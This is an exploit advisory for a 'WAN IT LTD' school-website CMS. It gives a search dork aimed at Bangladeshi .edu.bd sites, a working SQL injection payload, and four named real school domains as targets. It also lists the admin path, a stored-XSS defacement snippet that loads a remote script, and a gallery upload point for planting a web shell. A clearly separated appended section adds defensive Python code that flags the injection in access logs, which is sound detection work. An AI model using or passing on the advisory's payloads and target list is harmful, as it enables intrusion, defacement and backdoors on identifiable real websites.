
WAN IT LTD - SQLInjection / XSS / JSDeface

#Title: WAN IT LTD SQL/XSS Deface
#Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd"
#Date: 26.10.2017
#Test: W10
#CWEs: CWE-89
#Exploit Discovered By: Informacion - Anonymous
#Author: mr.Gh0st N@0b
#======================#
#P00f:
#http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject} |---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x716a7a7171)-- Satn
Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] ---|
#Admin Panel
#http://site.com/admin/ {login Here}
#Dem0s:
#http://sonarhatsnc.edu.bd/about_us.php…
#http://rwahs.edu.bd/
#http://www.gozkhalimlths.edu.bd/
#http://coghighschool.edu.bd/
#XSS Alert
#/admin/add_news.php?menu=news {Exploit XSS Script}
#Example
#<script src="http://yourdeface.js"></script>
#<META http-equiv="refresh" content="1;URL=yourdefacepage">
#Upload Shell
#/admin/add_gallery.php?menu=gallery {Upload Here}
#===========================================#
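
The request pattern in the proof above can be picked out of web server access logs. The following is an added example, not part of the original advisory: it flags requests to about_us.php whose id value breaks an allow-list format, contains a UNION ... SELECT, or carries the hex-encoded q...q delimiters seen around the sqlmap test string in the payload above. The log lines are constructed, and the allowed id format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Oct/2017:10:01:02 +0000] "GET /about_us.php?menu=aboutus&id=about-0000001 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Oct/2017:10:01:07 +0000] "GET /about_us.php?menu=aboutus&id=-8681%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x716b766a71,0x41,0x716a7a7171)--%20Satn HTTP/1.1" 200 5333',
    '203.0.113.9 - - [26/Oct/2017:10:02:11 +0000] "GET /about_us.php?menu=aboutus&id=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Oct/2017:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 900',
]

REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids contain only letters, digits, "-" and "_".
ID_OK = re.compile(r'^[A-Za-z0-9_-]{1,32}$')
UNION_RE = re.compile(r'\bunion\b.{0,40}\bselect\b', re.I | re.S)
# Delimiters in the payload above: "q" + 3 letters + "q", hex-encoded (0x71......71).
SQLMAP_MARK = re.compile(r'0x71[0-9a-f]{6}71', re.I)

def classify(line):
    """Return the reasons a log line looks like injection into id, or []."""
    m = REQ_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/about_us.php"):
        return []
    reasons = []
    # parse_qs percent-decodes values, so encoded payloads are matched too.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not ID_OK.match(value):
            reasons.append("id-format")
        if UNION_RE.search(value):
            reasons.append("union-select")
        if SQLMAP_MARK.search(value):
            reasons.append("sqlmap-marker")
    return reasons

def flagged_sources(lines):
    """Map client IP -> sorted reasons across all of its flagged requests."""
    hits = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.setdefault(line.split()[0], set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}

if __name__ == "__main__":
    for ip, reasons in flagged_sources(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

Access logs record only the query string, so payloads sent in POST bodies to the admin pages need request-body logging or a WAF to be seen.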
